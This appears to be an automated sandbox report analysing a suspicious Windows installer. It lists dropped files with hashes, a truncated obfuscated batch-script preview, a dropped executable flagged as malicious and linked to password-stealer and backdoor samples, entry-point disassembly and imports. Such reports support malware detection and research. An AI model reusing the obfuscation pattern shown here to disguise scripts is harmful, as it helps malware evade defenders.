                                                                                                                                                                                        Preview:=........`..v.$.M$%.%G.-...N='.?.v...r.]~q..$.$/..eW..8.R..d.Y.v..WA.Ab.1.....{...)............(L..w...;.............,+... .......H....E$......E......1..................T5.....:."..e...D.d.ficc......j.........~.i3M3..m...1....U....z.^..:y}.Z.&.I`LD.1U...a..+.e...j{{{.{...x.....2"..t..5cO.. ]....Ao...K5.a....j.p..R..d29.m...=.........!`.8Q#.........`ZU'.....z..[.Tj.[...l....u..yHD....`......g....r@NU....zZU.Z.u&.N.z..#.-.\.g..i...<c...".$..\...m...@.(.>yU..a....a..eYV<......@..._U...........6...%...jADV...L.......$@TD..Q.).9........l......S.i..L&.t.G..avv....zj.......nozO..y..WT.E.b.T....x..#...f..a.......a.9.6..8.U.vj.%...m....D.{4....|o..P....3. ...|W......~CD......-..x..v{.....~..8..Z..=...%.e......*PN$.^..#.{.../.....q.f.......4....._....R....d.8.G...)m.\^^.,.|\D....'..W..T..i..D"..ax.....B..m..j..c..`..d..nR-?.+.a.c.h...<.."..Ej..O..j;....Z..q.MU...<...=.........1....v...*.:.....y<...#..g.>.0.m.\U.AD...kx.>(..U..c........G.[..MUMR
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                        Entropy (8bit):2.6516860651113467
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:xjLHdAWeg1Q319sx9kaxCV6qTb4Ph5qRtFV82rcx/hQ4v3U+mX9nhi:xjLWWel319stEjFtr+/hdvEA
                                                                                                                                                                                        MD5:4B932AA83E6B9828C48EFC6C32F52A25
                                                                                                                                                                                        SHA1:36396AE5C0C3A2C46F7BE2439EDD654465CA5505
                                                                                                                                                                                        SHA-256:8D43CD6EE32A87B53944D2EF0637C629925C67B664CDC49B010C0D9BCCBDE87A
                                                                                                                                                                                        SHA-512:53116BD05A8C3D3B99821FB3CB3A96F1397E82A92F5EE03F347FE26EB9B700482D0207241F17D6BA94FB5769B34B2CF8153BC7D1C2F96397A8E2BA4CB89057F9
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (1326), with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):25995
                                                                                                                                                                                        Entropy (8bit):5.037814634170457
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:q39ZC1DqgAISNC4Pp0hvVZeaTclMlEIHDE7F++IqxvSrCaJy7T:WvCEXISNr0fZeaTYojE7F++IYvSrjJy3
                                                                                                                                                                                        MD5:6969D2308EE5AFE17CED449AFE8F6FBE
                                                                                                                                                                                        SHA1:878D4F2B3D43265F31A0D26669D5B4AB0A02BEE5
                                                                                                                                                                                        SHA-256:C2A330ADBFBCAFC43FD6A1C0E2738F4DA8419719EFC3FA72FC3D519024A5A701
                                                                                                                                                                                        SHA-512:832F28350EDBA8C58AE50B7861C18A550C2774BEE4F5BD42D69E87C8E4E2CB61A9E28976A8162CE3020C7636809FB03A2FDEA708EB7A8F5FD0161F3D3B501E66
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:Set Medicaid=u..hWlWallet Eq Feed Ty ..bYParties Funds ..GlqRFingering Believed Raise Short ..iVFeDispatched Ultimate Wiley Impression Rental Map Characteristics Side ..exDCooked La Automation Each Guitar Gl Timing Colony ..LprpGenre Johnston ..xLUcAllowing Convenience ..GaGmbh Incorporated Sci Amazing Rrp ..Set Downloads=h..QSDame Cartridge Online Information Costs ..zDsOReached Philippines Pockets ..xqnSRussia ..vPUnable Cedar Elections Thumbnails ..rIYSRequiring Serbia Rely Sing Guest ..ewKeCage Ford Ben Teams Launch Stay Verde ..MlLRDrives ..tIGPlaced Repair Seminar Columbus Ul Naples Dm ..Set Payroll=m..LqReferrals Paste Sharing Saw Contributed Adverse Constant ..LlEngland Angle ..ICMMGrow Accreditation Global Wedding ..poDebut Consumers Ka ..wpZImages ..TTHJurisdiction Vice Maiden Positive ..UGFyLinked Fax Oak Publication Fish Plots Jeff ..Set Nine=...YqkKBruce ..TkStylish ..MYBvPaying Epinions Discrimination Playing ..tNZMobiles Edited Report Robots Yards Dramatically Spanking .
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (1326), with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):25995
                                                                                                                                                                                        Entropy (8bit):5.037814634170457
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:q39ZC1DqgAISNC4Pp0hvVZeaTclMlEIHDE7F++IqxvSrCaJy7T:WvCEXISNr0fZeaTYojE7F++IYvSrjJy3
                                                                                                                                                                                        MD5:6969D2308EE5AFE17CED449AFE8F6FBE
                                                                                                                                                                                        SHA1:878D4F2B3D43265F31A0D26669D5B4AB0A02BEE5
                                                                                                                                                                                        SHA-256:C2A330ADBFBCAFC43FD6A1C0E2738F4DA8419719EFC3FA72FC3D519024A5A701
                                                                                                                                                                                        SHA-512:832F28350EDBA8C58AE50B7861C18A550C2774BEE4F5BD42D69E87C8E4E2CB61A9E28976A8162CE3020C7636809FB03A2FDEA708EB7A8F5FD0161F3D3B501E66
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:Set Medicaid=u..hWlWallet Eq Feed Ty ..bYParties Funds ..GlqRFingering Believed Raise Short ..iVFeDispatched Ultimate Wiley Impression Rental Map Characteristics Side ..exDCooked La Automation Each Guitar Gl Timing Colony ..LprpGenre Johnston ..xLUcAllowing Convenience ..GaGmbh Incorporated Sci Amazing Rrp ..Set Downloads=h..QSDame Cartridge Online Information Costs ..zDsOReached Philippines Pockets ..xqnSRussia ..vPUnable Cedar Elections Thumbnails ..rIYSRequiring Serbia Rely Sing Guest ..ewKeCage Ford Ben Teams Launch Stay Verde ..MlLRDrives ..tIGPlaced Repair Seminar Columbus Ul Naples Dm ..Set Payroll=m..LqReferrals Paste Sharing Saw Contributed Adverse Constant ..LlEngland Angle ..ICMMGrow Accreditation Global Wedding ..poDebut Consumers Ka ..wpZImages ..TTHJurisdiction Vice Maiden Positive ..UGFyLinked Fax Oak Publication Fish Plots Jeff ..Set Nine=...YqkKBruce ..TkStylish ..MYBvPaying Epinions Discrimination Playing ..tNZMobiles Edited Report Robots Yards Dramatically Spanking .
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                        Entropy (8bit):6.660371238879616
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:Vml6QdugR9Qf7AOaosQEDfYmFdn3TJicB:0v7Qf0VosQE7YmFdnd
                                                                                                                                                                                        MD5:24FF1D39A661D345C3AB496FC46350A0
                                                                                                                                                                                        SHA1:46E9ED1F123904934276A9C44FEE009AF3D8DBF2
                                                                                                                                                                                        SHA-256:66C472499DFF5759EA709E4412008B09AAE9C8479FA325ECF47C9A5EA5776EBC
                                                                                                                                                                                        SHA-512:37E425D409483B4D2B4D80B0AC0BC425EF9EA61D7167BEE507ABD63D78AAF86B998F58FAD5849FFA539875CBAD97A0958490B2488040EB07A034F6204D63739A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:P.r......2..........\....j.......P..`..................\.................3.3.....`.......`......A..;.....u.....b.....\.....s..K......`.....\....A......................L.....&v.j&X....N!J...4.O!J............W..1............j.P.R1.......P..........L!J....H.J.P........P.....................................u.3.........,...P.......r........z.....,......m.....,...3......3......0........0......F..;.....u.....5.....,.....s.........0.....,..........,....w|..0........P........,...P..0...SP...........=..............,............,...3......3......0........0......F..;.....u..R...;.,......................0.................u...,...........t...,.........3.3.....................+...|.....................u%;.......!.......V..............0....3.3........9.............stW;.u.........@................................................@A..............;.....u...t4..s......;.u..........A.........3................A...s........|.........F;..........,......P......P..0...SP.......................+
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                        Entropy (8bit):6.497908528078612
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:88yDJ6bV6ybE5gOHu1QVT+27QwpMydPBZwnNMYVt/Fk73An4V9D0+xDkIPpEmV3i:88yDGVFE5gOHu1CwCMIBZwneAJu7Qnsa
                                                                                                                                                                                        MD5:BE070B66DDEA4F0CDE50137E57909E34
                                                                                                                                                                                        SHA1:7E19653A320CB3227153C7B725751C2B74A3697F
                                                                                                                                                                                        SHA-256:A1E1FD3DD8CC3A1E978EAB91C376AD040687CAD05D261301A6F7EADFE9A75FB2
                                                                                                                                                                                        SHA-512:B90FF1DF6A5B40B368373CFE0196CF632F11C20E676F52141628346933840B38B1DD96B0273CC3EC1711A1B7E0C6704E8B1304803A00DEE4098BCF3D7E8104FA
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:T)M...................V.u.h4....6...t(.T)M............<...h...<...`.......X...V.u.h3....u...x.I..M.................u..E.P........4.I..E.Pj.h(...........H.I.........H.I..u....u.V..@.I....E.V........`.I....u..=.#M..u.j...j.....I....u..G...j..6..\.I......t.j...j.....I....#..........E.......~H.........<.u........<.......<.......<.......<................6..H.I.j...j.S..@.I......uM.......j.HPS..@.I......u4.......HPj.S..@.I......u........HP.......HPS..@.I...S.6..`.I........i....a...W.u.....I.j.W........8..)M.t.9..)M...2.....)M...tV..9.t..@...e...M.WSR...)M....)M....VQ...P......)M.....)M.....t.V..(M...............3.......E..[......t!I.....B.........P...PSV.Er.......QQV.g......WV..c......j...Q......P...PWV.q............P...PSV.ru...........PW...PV.._...j.........P...PV..h...........P...PSV.b...>....M.WSVQQ.}f...,...WSV..h......j..&...j............t......_...Q.........S.P...PV.if.......Q..j......S.P...PV.O].........t.I.WS..#M.h.......@)M..M.WSh...............V..x.I.....SV.$c...
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                        Entropy (8bit):6.562684485137087
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:vqmfyLGNZIEMHeoMmOrE2fKMg1S4gm4/O3JYHqJl/JJQJIokqmfqh+rg:BfhjLueoMmOrrHL/uDoiouK+rg
                                                                                                                                                                                        MD5:F35DEC335EF9E69710D927917B55E546
                                                                                                                                                                                        SHA1:88FC9B8C3B33C746E9A4DBD7A0CD752EC7B1375E
                                                                                                                                                                                        SHA-256:C377583FB2206D029ADD6182126EC7374BCDC27BAAA9C3E8C17F4D1842B7A8E2
                                                                                                                                                                                        SHA-512:67A6F0D517BFEFE6D8B7A1326F2EC8CAE2AC10E799536C47F9CDE93ADAE6CDBC41237471C7023FE5734A5A06B1177A3340C1F04C219F4D993BDF310A35B84096
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:......F........A...U.f;E.......jNXf;.......jGXf;....................A..AjNXf9E.u).y..u#j..E..M.PSV...:...........u.S......}.......t...B.Ph................M.U.R...P.....S......F......@.Ph.........E..e......e....VPS.u..E..................E....@....f.x..t...@...Pjr._.........E....f..A.......u.M..9...E...P.E.P.E.P.E.Pj..:......M......C....td....RtQ...t3...t ...t..M..E.P....'.u..M...D...2.M..E.P.......M..E.P.AD...u..M..:.....u..M...J...E.P.M.......]..{..u...j..W:...u.M...8...E..P.E.PS......M....%C...M..%l...K.u.M..8...E...P.E.P.E.P.E.P.u..S......M......B....t.......u..u.V...X......M...B...M...k...M..E...I..M....u......Y_^[....S..QQ......U.k..l$....X.S.VW.{..R..M.jH.....^.u......f9p..u.u..D......@.Pjp........7....s..M......73.}..M..E.G........@.f;E.u.B..f;E.u.J..j@_f;.}.u...t...x.F..{..E.VPW.E.M..M..M.P.E............y..M.........U.j@^...f9p.u.I.....jGX...L..P.@...u.....}...E.uYf.E..M.3.j.f.E..x@...}..u..E..@...3..M.E.E.P......P....s..E..WPj......M.E.......
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):58368
                                                                                                                                                                                        Entropy (8bit):6.625646895070276
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:xPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+1:eBiqXvpgF4qv+32eOyKODOSpQ1
                                                                                                                                                                                        MD5:84C2E74A644AA997AF6A5389BE8A5E12
                                                                                                                                                                                        SHA1:9BE822B2A46731991BF457FD856AFCF11B98AC58
                                                                                                                                                                                        SHA-256:A2F69512D8C1AB43296FF0D0D0C74D9120581C7DF5B51C03376B16DB071A6153
                                                                                                                                                                                        SHA-512:75BBF09A0BEB2FC1E8375109D007F0C101A1F4E9C0463A421AC637828B69DD0F21907A10FEEA1CAF7FA8F710D2CCEDCA3330DDC3C8BD87EB2958E4580640D3F6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:..A.<Zw.........J......3.E.......J....].....U..M..A.f..Zw.........J......3.E.......J....].....U..V.u....P..r....e..F...P."....Yu....P..r..Y..xu.....E.................F.......F..u.^]..U..QSV..M.Wj.Q.~....'..F..e..HP.....M.......F..8"t..E.;F.r..F.....2..?.u...t..._^[..].....U..QSV..M.Wj.Q.~....'..F..e.....P.]....M.......F..8"t..E.;F.r..F.....2..?.u...t..._^[..].....V..H..........u....^.S3.9^........:..........B...........^8.^......F.9^........v...F1..P.!....F....t....w..$..rB....X....E.N(..^$.^0.^ .^,.^<.8........'..........^(.!...A........................h....F....F1....k....F...P.....P......J....F.[^.I.\rB.erB.zrB..rB..rB..rB..rB..rB...V..H.........u....^.S3.9^...................&...........^8.^......F..9^........v...F2..P.6....F....t....w..$..tB....Z....E.N(..^$.^0.^ .^,.^<.8........'..........^(.!...L.........................g....F....f.F2f....g....F....P.....P......E....F.[^..ysB..sB..sB..sB..sB..sB..sB..sB...V..H.........u....^.S3.9^.........................
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                        Entropy (8bit):6.3761289670767
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:YN6MvI1hGOWrovtB81k8xAd8syJq7CQngD49EdWazm:iQ18OWrM81EyJqx9Edzm
                                                                                                                                                                                        MD5:7FBBE35DB8693990B14CEBBD28BCE879
                                                                                                                                                                                        SHA1:FD529B9836D8275399A160A3227AC15DEA1C4FC0
                                                                                                                                                                                        SHA-256:807ED5AC623035D54EEFD896CD6CC6F7569A27252DFA62FEE547CE9CFB8418D3
                                                                                                                                                                                        SHA-512:0F237671AE4138605D5256E34F67242D4004727753A01870460DBF5D681B4FC86C2877328D60D23723DE34927B95C88E76180380D16CE3EF428A283115AF73B7
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0
                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):947288
                                                                                                                                                                                        Entropy (8bit):6.630612696399572
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                        MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                        SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                        SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                        SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                        • Filename: SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: SecuriteInfo.com.Win32.PWSX-gen.28191.20359.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: 3hKak4Fdou.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: gaVr0jXXLk.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: BUpr7r9zdo.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: package80171530600.jpg.lnk, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: QJwM0vJ5mk.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: 4U9frILl8q.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: 4U9frILl8q.exe, Detection: malicious, Browse
                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                        Entropy (8bit):7.981687548666032
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:file.exe
                                                                                                                                                                                        File size:751'720 bytes
                                                                                                                                                                                        MD5:0c4cb8fd1e3cc4b42556562d317e6e59
                                                                                                                                                                                        SHA1:8a572e6ef21e54b76cf0b38099c6ca47d607170e
                                                                                                                                                                                        SHA256:e787e9b3eb07676a4848cb9ff1dad9a19a5b3aa11a220b2ba3d447ac6680abeb
                                                                                                                                                                                        SHA512:0b7c6520fe39261743cb6f85a601d9e7306a17e25b1909150a14cd4e31e5c2d9c0faef30effbd1dc1eb1108da53b0f6284d701ce37ab5cef5dbcf9a2f8634652
                                                                                                                                                                                        SSDEEP:12288:dXxKusPyZi+9cn2eIIcXopkUxTBdmEkH1Vmkw8dUfmBpHG9Yg1p8mgNahqYSkjQH:dXxKusaZi+9pI3xl1u1q/fmpnepSzYSr
                                                                                                                                                                                        TLSH:F3F42311B3F4E86AF5817F39BB786FA23DB4579C80C6144B7B600A24EC76163AD4612F
                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...c..d.................f...".....
                                                                                                                                                                                        Icon Hash:78d8dac6c491f270
                                                                                                                                                                                        Entrypoint:0x4034fc
                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                        Time Stamp:0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                        Signature Issuer:CN=SSL.com Code Signing Intermediate CA RSA R1, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                        Error Number:-2146869232
                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                        • 26/01/2024 10:49:23 25/01/2027 10:49:23
                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                        • CN=ObviousIdea, O=ObviousIdea, L=Castanet Tolosan, S=Occitanie, C=FR
                                                                                                                                                                                        Version:3
                                                                                                                                                                                        Thumbprint MD5:056DD2B9C64EB49C135AA03995F0E5F7
                                                                                                                                                                                        Thumbprint SHA-1:6CB5B490F195BE1887DAF56BDA2F897719D0E9B4
                                                                                                                                                                                        Thumbprint SHA-256:7B021E1D3B393FE7E31199C79CF7145EB900E5C165E76936D21B7D8202411CD3
                                                                                                                                                                                        Serial:4781773076BEE512F85C65F34E9B37C9
                                                                                                                                                                                        Instruction
                                                                                                                                                                                        sub esp, 000003F8h
                                                                                                                                                                                        push ebp
                                                                                                                                                                                        push esi
                                                                                                                                                                                        push edi
                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                        pop edi
                                                                                                                                                                                        xor ebp, ebp
                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                        mov dword ptr [esp+20h], ebp
                                                                                                                                                                                        mov dword ptr [esp+18h], 0040A2D8h
                                                                                                                                                                                        mov dword ptr [esp+14h], ebp
                                                                                                                                                                                        call dword ptr [004080A4h]
                                                                                                                                                                                        mov esi, dword ptr [004080A8h]
                                                                                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                                                                                        push eax
                                                                                                                                                                                        mov dword ptr [esp+4Ch], ebp
                                                                                                                                                                                        mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                                                                        mov dword ptr [esp+00000150h], ebp
                                                                                                                                                                                        mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                                                                        call esi
                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                        jne 00007F0044E1898Ah
                                                                                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                                                                                        mov dword ptr [esp+34h], 00000114h
                                                                                                                                                                                        push eax
                                                                                                                                                                                        call esi
                                                                                                                                                                                        mov ax, word ptr [esp+48h]
                                                                                                                                                                                        mov ecx, dword ptr [esp+62h]
                                                                                                                                                                                        sub ax, 00000053h
                                                                                                                                                                                        add ecx, FFFFFFD0h
                                                                                                                                                                                        neg ax
                                                                                                                                                                                        sbb eax, eax
                                                                                                                                                                                        mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                                                                        not eax
                                                                                                                                                                                        and eax, ecx
                                                                                                                                                                                        mov word ptr [esp+00000148h], ax
                                                                                                                                                                                        cmp dword ptr [esp+38h], 0Ah
                                                                                                                                                                                        jnc 00007F0044E18958h
                                                                                                                                                                                        and word ptr [esp+42h], 0000h
                                                                                                                                                                                        mov eax, dword ptr [esp+40h]
                                                                                                                                                                                        movzx ecx, byte ptr [esp+3Ch]
                                                                                                                                                                                        mov dword ptr [00429AD8h], eax
                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                        mov ah, byte ptr [esp+38h]
                                                                                                                                                                                        movzx eax, ax
                                                                                                                                                                                        or eax, ecx
                                                                                                                                                                                        xor ecx, ecx
                                                                                                                                                                                        mov ch, byte ptr [esp+00000148h]
                                                                                                                                                                                        movzx ecx, cx
                                                                                                                                                                                        shl eax, 10h
                                                                                                                                                                                        or eax, ecx
                                                                                                                                                                                        movzx ecx, byte ptr [esp+0000004Eh]
                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3a0000x1890.rsrc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xb59d00x1e98
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                        .text0x10000x65560x6600dd25e171f2e0fe45f2800cc9e162537dFalse0.6652113970588235data6.456753840355455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .data0xa0000x1fb380x6002bc02714ee74ba781d92e94eeaccb080False0.501953125data4.040639308682379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .ndata0x2a0000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .rsrc0x3a0000x18900x1a004e1f44f57c1e72aa13be7b7dd21bb315False0.6350661057692307data5.864245238845219IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                        RT_ICON0x3a1900x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.7420309653916212
                                                                                                                                                                                        RT_DIALOG0x3b2b80x100dataEnglishUnited States0.5234375
                                                                                                                                                                                        RT_DIALOG0x3b3b80x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                        RT_DIALOG0x3b4d80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                        RT_GROUP_ICON0x3b5380x14dataEnglishUnited States1.05
                                                                                                                                                                                        RT_MANIFEST0x3b5500x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                                                                                        DLLImport
                                                                                                                                                                                        ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                                                                                                                        SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                                                                                                                        ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                                                                                                                        COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
